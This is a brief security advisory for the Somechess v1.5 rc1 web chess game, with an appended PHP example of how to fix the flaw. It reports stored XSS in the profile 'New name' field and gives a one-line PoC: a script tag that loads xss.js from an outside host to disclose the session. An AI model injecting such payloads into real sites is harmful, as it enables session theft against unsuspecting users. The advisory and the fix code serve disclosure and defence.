Somechess v1.5 rc1
Homepage:
http://www.astrodogpress.org/chess/
Affected files:
*Profile input boxes
When importing the SQL dump, if you get errors and it won't create the tables & data (like
it did to me), then just remove all the " characters from the SQL file. You'll also have to manually
add players & their passwords (md5 hashed) via phpMyAdmin or whatever you use. There's also a PHP
error in menu.php that you'll have to fix, since it won't allow you to connect to the game DB.
XSS vulnerability with session disclosure in the "New name" profile input box.
Data isn't sanitized before being output. PoC:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://youfucktard.com/xsp/somechess1.jpg
http://youfucktard.com/xsp/somechess2.jpg
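
Added example (not Somechess code and not from the original advisory): one way to close the "New name" hole in PHP, by validating the name on input, encoding it on output, and keeping the session cookie away from page scripts. The function names and the name policy are assumptions.

```php
<?php
// Added example, not Somechess code. Function names and the name policy
// (1-32 letters, digits, space, underscore, hyphen) are assumptions.

// Reject names outside the allow-list before they are stored.
function validate_player_name(string $raw): ?string
{
    $name = trim($raw);
    // \A and \z anchor the whole string, so a trailing newline cannot slip through.
    if (preg_match('/\A[A-Za-z0-9 _-]{1,32}\z/', $name) !== 1) {
        return null;
    }
    return $name;
}

// Encode at output time, so values stored before validation existed
// are still rendered as text rather than markup.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Keep the session cookie unreadable from page scripts, which limits the
// session disclosure an injected script can achieve (array form: PHP 7.3+).
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed sample input: the PoC string from this advisory.
$poc = '<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>';

// The PoC fails validation; if a stored copy is echoed, it is entity-encoded.
var_dump(validate_player_name($poc));
echo h($poc), PHP_EOL;
// A name that fits the assumed policy is accepted unchanged.
var_dump(validate_player_name('Kasparov_2'));
```

Output encoding is the control that matters for names already in the database; the allow-list only stops new bad values from being stored.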